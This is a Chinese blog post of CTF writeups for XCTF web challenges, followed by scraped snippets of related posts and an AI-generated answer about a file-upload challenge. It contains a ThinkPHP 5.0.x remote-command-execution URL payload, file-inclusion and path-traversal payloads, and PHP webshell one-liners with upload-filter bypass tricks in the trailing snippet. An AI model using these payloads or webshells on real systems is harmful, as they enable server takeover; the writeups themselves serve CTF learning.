攻防世界 web进阶区 writeup

最新推荐文章于 2024-06-30 17:20:59 发布
最新推荐文章于 2024-06-30 17:20:59 发布
阅读量592 收藏 1
点赞数 1
分类专栏: ctf 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_39938635/article/details/105643621
版权

目录

php_rce

参考链接1
参考链接2
根据提示看应该是tp5的远程命令/代码执行漏洞
然后网上搜下payload。
emmm分析我是看不懂的。
(实际上我试了好多payload。。。还有post??有的可以执行有的不能,菜刀还连不上,我也很迷)

5.0.x版的poc

命令执行:

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=操作系统命令 (如 dir whoami)

通过这行代码先找flag再cat即可

注意它会显示两遍,所以不是/flag/flag

Web_php_include

打开就是源码
在这里插入图片描述
啊,可以看到这个一直对php://进行过滤,那么什么是php://呢
参考链接:PHP漏洞全解————10、PHP文件包含漏洞,是一个伪协议
在这里插入图片描述
除此外还有php://filter

通过指定末尾的文件,可以读取经base64加密后的文件源码,之后再base64解码一下就行。

phar://
zip://
data:URI schema
等等
漏洞条件详见参考链接

求flag方法如下:(简单地大小写绕过一下)

在这里插入图片描述
在这里插入图片描述
得到flag

ics-06

。。。不想写了,谁能想到是暴破呢

warmup

热身,行吧
参考链接
进去就是一张大滑稽,源代码提示source.php
代码如下:

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

打开hint.php提示flag在ffffllllaaaagggg中。

分析一下代码
需要使用传参

source.php?file=source.php?(payload)
或者
source.php?file=hint.php?(payload)

又或者利用urldecoder进行双重解码即

source.php?file=source.php%253f
source.php?file=hint.php%253f

啊我研究了半天怎么能利用urldecoder绕过的问题,后来一搜writeup才知道不需要。。。直接用/…/即可

payload:
source.php(或hint.php)?/…/…/…/…/…/…/ffffllllaaaagggg

可以多套几层…/
原因如下
在这里插入图片描述

待续。。

[CTF]攻防世界web高手进阶Writeup(更新ing)
糖小喵
04-29 499
baby_web 解题方法: F12→Networks→刷新抓包→完成
攻防世界writeup
飞鱼的企鹅的博客
01-04 904
攻防世界 confusion1 第一次接触这样的漏洞,认真学习了一波 0x00题目介绍 打开是一个网站,有登陆注册功能,正中间还有一张图片(后来才知道代表php vs python) 但是点击登陆注册都显示404,就很迷了,之后又去扫描了网站,并没有发现什么有用的东西 偶然间查看页面源代码,发现了端倪 这个404界面暗藏玄机啊!但还是不知道怎么做这道题 0xo1查阅资料 其实就是查看wp…...
攻防世界-WEB-WEIPHP(记一次有趣的代码审计)
m0_52061428的博客
06-30 1241
其实很多时候,在面对一个站时,确认了站的特征(CMS,框架等等)就能够从github等平台上找到源码进行审计,从而发现问题并加以利用。
[攻防世界]-welpwn
m0_55906008的博客
12-05 684
pwn
攻防世界-入门12-Writeup
weixin_47848880的博客
02-08 505
攻防世界入门Writeup
攻防世界 web高手进阶 10分题 TimeKeeper
闵行小鱼塘
10-19 1586
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是TimeKeeper的writeup
攻防世界 web高手进阶 10分题Confusion2
闵行小鱼塘
10-13 1169
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是Confusion2的writeup
攻防世界 web高手进阶 10分题 url
闵行小鱼塘
10-19 1817
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是url的writeup
攻防世界 web高手进阶 10分题 Guess
闵行小鱼塘
11-03 1506
继续ctf的旅程,开始攻防世界web高手进阶的10分题,本文是Guess的writeup
[CTF刷题篇]攻防世界Web进阶之unserialize3 Writeup
qq_43668710的博客
04-22 693
前言 有了之前的PHP反序列化漏洞实例复现姿势详解这篇文章,突然发现自己终于不再畏惧关于反序列化的题了,刚刚遇见甚至还有一丝兴奋,终于可以验证自己这段时间的付出了! 分析 访问题目中给的url; 很明显,这题就考了2个点: `反序列化` `魔术函数__wakeup()的绕过` 附:绕过__wakeup()的姿势: __wakeup 触发于 unserilize() 调用之前, 当反序列化时的字...
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
攻防世界 pwn进阶解法 write up(一)
qq_46441427的博客
03-01 449
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
攻防世界-web篇(php_rce)详解
qq_54803507的博客
09-25 3510
web篇(php_rce)详解
攻防世界writeup——Web(持续更新)
Lethe's Blog
08-12 8439
lottery(XCTF 4th-QCTF-2018) 打开题目先注册,然后发现flag可以购买。但得先去买彩票赢得足够的钱,七位数字的彩票,猜中的位数越多,赢得的钱越多,因此应该在买彩票这里出了一些漏洞。 1、首先访问目录robots.txt,存在.git泄露。 2、利用工具GitHack,得到网站源码: 3、进行代码审计,问题出现在api.php里的buy函数,这个函数就是用来判断是否猜...
XCTF攻防世界进阶writeup(1-5)
stepone4ward的博客
07-04 1335
1. isc-06 进入题目后看到url后存在参数id,尝试各种注入方式后均无果,使用bp对id参数进行爆破后得到flag。 2.NewsCenter 对search参数进行bool类型的盲注 import requests s=requests.session() url="http://111.198.29.45:38153/index.php" key='' for i in range(1...
攻防世界misc_pic_again
淡巴枯的博客
10-31 417
题目描述:flag = hctf{[a-zA-Z0-9~]*}
WeiPHP 微信开发平台 SQL注入漏洞复现
0xSec
12-05 1146
weiphp微信开发平台 _send_by_group、wp_where、 get_package_template等接口处存在SQL注入漏洞,攻击者利用此漏洞可获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
ctf 攻防世界练习题writeup(第二部分)
Ohh24的博客
09-07 981
ctf 攻防世界web2cookie新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 cookie 由题可知本题考查cookie,那么什么是cookie? 新的改变 我们对Markdown编辑器进行了一些功能拓展与
php writeup,writeup---你真的会PHP吗?
weixin_31578739的博客
03-29 179
实验吧的一道题php审计题.http://ctf5.shiyanbar.com/web/PHP/index.php抓包发现:hint:......txt是这样的,根据response反馈的信息,我们可以看见 hint(提示)那就打开它看看吧代码审计//条件1:判断是否为数值型if(is_numeric($_REQUEST['number'])){$info="sorry, you cann't i...
攻防世界web的upload1
最新发布
03-21
<think>嗯,用户需要关于攻防世界Web部分的Upload1挑战的解题思路或writeup。首先,我应该回忆一下常见的Upload类题目的常见漏洞点,比如文件上传绕过、黑名单过滤、MIME类型检查、.htaccess利用、内容检测绕过等。 根据提供的引用,其他Upload题目如upload3可能涉及Git泄露、远程命令执行漏洞(如ThinkPHP的RCE)或者数据库中的敏感表字段。可能需要扫描目录,利用工具如GitHack获取源码,或者通过上传webshell获取flag。例如引用[2]提到通过Git泄露获取源码,引用[4]使用了ThinkPHP的RCE漏洞执行命令。 对于Upload1,可能类似的思路适用。首先需要检查是否有前端验证,比如文件类型、扩展名的检查,是否可以被绕过,比如修改Content-Type、使用双扩展名(如.php.jpg)、或者大小写绕过(如.PhP)。此外,服务器可能配置了黑名单,需要尝试上传.htaccess文件来允许执行特定扩展名,或者利用解析漏洞,比如Apache的解析顺序问题。 另外,可能需要结合其他漏洞,比如文件包含,通过上传图片马,然后利用文件包含漏洞执行其中的代码。或者检查是否有二次渲染,使用绕过技巧。也有可能上传后文件名被重命名,需要找到上传路径和文件名规律。 查看用户提供的引用,特别是引用[3]中提到secret_table和fl4g字段,可能提示需要数据库注入或读取文件,比如通过上传PHP文件执行系统命令读取flag。引用[4]中的RCE payload可能相关,如果存在框架漏洞的话。 综上,解题步骤可能包括:检查前端验证,尝试绕过文件类型检查;上传webshell或恶意文件;利用解析漏洞或.htaccess;结合其他漏洞如文件包含或RCE执行命令获取flag。需要分步骤测试,并参考已有的writeup中的常见方法。</think>### 攻防世界 Web Upload1 解题思路 #### 1. **题目初步分析** - **目标场景**:文件上传类挑战,通常需要绕过上传限制,上传恶意文件(如Webshell)或触发漏洞获取服务器权限。 - **常见限制**:扩展名黑名单、MIME类型检查、文件内容检测、路径重命名等[^1][^3]。 #### 2. **关键步骤与绕过方法** 1. **检查前端验证**: - 通过浏览器开发者工具查看前端代码,确认是否有扩展名过滤逻辑。若存在,可手动修改请求绕过(如Burp Suite拦截修改`filename`)[^2]。 - 示例Payload:上传`.php`文件,修改为`.php5`或`.phtml`(若服务器解析此类扩展名)。 2. **绕过MIME类型检测**: - 若服务器校验`Content-Type`,需伪造类型(如`image/jpeg`),但文件内容仍保留PHP代码。 - 示例上传请求头修改: ```http Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: image/jpeg ``` 3. **利用.htaccess文件覆盖**(适用于Apache服务器): - 上传`.htaccess`文件,配置特定扩展名解析为PHP: ```apache AddType application/x-httpd-php .abc ``` - 后续上传扩展名为`.abc`的Webshell即可执行。 4. **文件内容绕过**: - 若服务器检测文件内容关键字(如`<?php`),可替换为短标签`<?=`或使用编码/混淆技术。 - 示例代码: ```php <?= system($_GET['cmd']); ?> ``` 5. **结合其他漏洞**: - 若存在文件包含漏洞,可上传图片马(如包含PHP代码的JPEG文件),通过包含触发代码执行[^4]。 - 若服务器存在已知框架漏洞(如ThinkPHP RCE),直接构造Payload读取Flag。 #### 3. **实战示例** 假设题目限制上传`.php`但未过滤`.phar`: 1. 上传Webshell文件`shell.phar`,内容为: ```php <?php system("cat /flag"); ?> ``` 2. 访问上传路径`/uploads/shell.phar?cmd=ls`,触发命令执行。 #### 4. **扩展技巧** - **双写扩展名绕过**:如`shell.pphphp`,若过滤逻辑为删除`php`字符串。 - **大小写混淆**:如`shell.PhP`(Windows服务器不分大小写)。 - **利用解析漏洞**:如`shell.php.jpg`被Apache解析为PHP(需特定配置)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值